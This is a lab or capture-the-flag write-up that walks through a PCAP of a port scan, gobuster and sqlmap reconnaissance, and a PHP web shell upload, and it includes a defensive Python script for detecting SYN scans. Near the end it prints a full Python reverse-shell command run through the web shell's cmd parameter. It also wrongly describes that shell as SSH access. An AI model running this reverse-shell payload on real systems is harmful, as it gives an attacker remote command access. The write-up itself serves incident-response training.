Scenario
The SOC received an alert in their SIEM for ‘Local to Local Port Scanning’ where an internal private IP began scanning another internal system. Can you investigate and determine if this activity is malicious or not? You have been provided a PCAP, investigate using any tools you wish.
What is the IP responsible for conducting the port scan activity?
First we’ll open the BTLOPortScan.pcap file in Wireshark and take a quick scroll through the capture; the traffic between two particular hosts stands out almost immediately. The [SYN], [RST, ACK] pattern tells us that one host is trying to open connections to a large number of ports, and the target resets each connection because the port is closed. This means the IP address doing the scanning is 10.251.96.4.
What is the port range scanned by the suspicious host?
Now that we know which hosts we’re dealing with, we can use the filter ip.src == 10.251.96.4 && ip.dst == 10.251.96.5 to focus on just the two that matter.
To find the answer to the question we’ll use the Destinations and Ports statistics (Statistics > IPv4 Statistics > Destinations and Ports), filtered with ip.addr == 10.251.96.5, to get a list of the ports that were scanned. Since we’re asked for the range, we only need the lowest and highest port, which gives us the answer 1-1024.
What is the type of port scan conducted?
In the first step we already noticed that we’re dealing with TCP traffic, and with the source and destination filter applied it’s easy to see that every probe is a lone SYN that never completes a handshake, so the answer here is TCP SYN.
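The three answers above (scanner, port range, scan type) can be pulled out of a capture programmatically with the same logic: group bare-SYN probes by (source, destination) and count the distinct destination ports. The following stdlib-only Python script is an added example for this write-up, not the challenge’s own tooling or Wireshark output; it reads the classic libpcap format (Ethernet link type only, no pcapng), and the capture it runs on by default is constructed in memory with the write-up’s two IP addresses.

```python
"""Detect TCP SYN scans in a libpcap capture using only the stdlib (added example)."""
import socket
import struct
import sys
from collections import defaultdict

TCP_SYN, TCP_RST, TCP_ACK = 0x02, 0x04, 0x10


def iter_pcap_frames(data):
    """Yield the captured bytes of each record in a classic libpcap file."""
    magic = struct.unpack("<I", data[:4])[0]
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic libpcap file (pcapng is not handled here)")
    if struct.unpack(endian + "I", data[20:24])[0] != 1:  # DLT_EN10MB
        raise ValueError("example handles Ethernet captures only")
    off = 24
    while off + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack(endian + "IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def parse_tcp(frame):
    """Return (src_ip, dst_ip, sport, dport, flags) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":  # not IPv4 over Ethernet
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6 or len(ip) < ihl + 14:  # not TCP, or TCP header truncated
        return None
    tcp = ip[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    return socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20]), sport, dport, tcp[13]


def find_syn_scans(pcap_bytes, min_ports=20):
    """One summary per (scanner, target) pair that sent bare SYNs to at least min_ports ports."""
    probes = defaultdict(set)  # (scanner, target) -> ports hit with SYN and no ACK
    closed = defaultdict(set)  # (scanner, target) -> probed ports that answered RST/ACK
    for frame in iter_pcap_frames(pcap_bytes):
        pkt = parse_tcp(frame)
        if pkt is None:
            continue
        src, dst, sport, dport, flags = pkt
        if flags & (TCP_SYN | TCP_ACK) == TCP_SYN:
            probes[(src, dst)].add(dport)
        elif flags & (TCP_RST | TCP_ACK) == TCP_RST | TCP_ACK:
            closed[(dst, src)].add(sport)  # the reply travels target -> scanner
    summaries = []
    for (scanner, target), ports in probes.items():
        if len(ports) < min_ports:
            continue
        summaries.append({
            "scanner": scanner, "target": target, "scan_type": "TCP SYN",
            "port_range": (min(ports), max(ports)), "ports_probed": len(ports),
            "closed_ports": len(closed[(scanner, target)] & ports),
        })
    return summaries


def build_frame(src_ip, dst_ip, sport, dport, flags):
    """Minimal Ethernet/IPv4/TCP frame for constructed test data (checksums left zero)."""
    eth = bytes(12) + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return eth + ip + tcp


def build_pcap(frames):
    """Wrap frames in a little-endian classic pcap file."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]
    for i, frame in enumerate(frames):
        out.append(struct.pack("<IIII", i, 0, len(frame), len(frame)))
        out.append(frame)
    return b"".join(out)


def constructed_capture():
    """Constructed sample: SYN scan of ports 1-1024 from .4 to .5, everything but 80 closed."""
    scanner, target = "10.251.96.4", "10.251.96.5"
    frames = []
    for port in range(1, 1025):
        frames.append(build_frame(scanner, target, 40000 + port, port, TCP_SYN))
        reply = TCP_SYN | TCP_ACK if port == 80 else TCP_RST | TCP_ACK
        frames.append(build_frame(target, scanner, port, 40000 + port, reply))
    # one benign handshake from a third host, which the heuristic must ignore
    frames.append(build_frame("10.251.96.7", target, 50000, 443, TCP_SYN))
    frames.append(build_frame(target, "10.251.96.7", 443, 50000, TCP_SYN | TCP_ACK))
    return build_pcap(frames)


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else constructed_capture()
    for summary in find_syn_scans(data):
        print(summary)
```

Run it with a pcap path to analyse a real capture, or with no arguments to run against the constructed one. The closed-port count is what distinguishes a scan from a busy client: a legitimate host rarely collects hundreds of RST/ACKs from one peer.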
Two more tools were used to perform reconnaissance against open ports, what were they?
Finding the two other tools is a bit more involved, but looking at the overall traffic we can notice that a lot of it is HTTP, and that there are many GET requests for what looks like a roughly alphabetized list of directory names.
This hints at an enumeration tool, and when we dig into one of the packets we can see from the data that a tool called gobuster 3.0.1 is indeed being used here. Gobuster uses a wordlist to enumerate web server content by simple brute force, and these lists generally consist of popular (sub)directory names to try.
Using the same method we can find that the other tool used was sqlmap 1.4.7.
What is the name of the php file through which the attacker uploaded a web shell?
What is the name of the web shell that the attacker uploaded?
Next we’ll focus on HTTP POST requests, since we know we’re looking for something related to uploading a file. Very quickly we notice /upload.php being used, and digging into that request gives us the answers to the next two questions at once.
First, the PHP file used to initiate the upload wasn’t actually upload.php, as that’s the file that performs the upload. Instead the Referer shows the originating page was editprofile.php, and the file that was uploaded (in a form field named, of all things, “fileToUpload”), i.e., the web shell, is called dbfunctions.php. It’s fair to expect that the attacker wanted to at least try to conceal the web shell, so they gave it a name that sounds like it would have a legitimate purpose on the system.
What is the parameter used in the web shell for executing commands?
What is the first command executed by the attacker?
Since we now know which file is being used as the web shell, it’s rather trivial to find out what it was used for. We can simply look at the requests where dbfunctions.php was accessed and what the cmd parameter (?cmd= in the actual HTTP request) was set to. The first one we see is id, which was used to check the user and the groups that user belongs to. Afterwards the attacker confirmed this with whoami before proceeding with their attack.
What is the type of shell connection the attacker obtains through command execution?
We know the attacker used a web shell, but what kind of shell connection were they able to establish afterwards? Looking further down the list of executed commands we find a Python command used to launch a reverse shell. The whole command is hard to read because of the percent encoding, but it is /uploads/dbfunctions.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.251.96.4%22,4422));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
What is the port he uses for the shell connection?
From the command above we can see that the attacker was using port 4422 for their reverse shell for SSH access.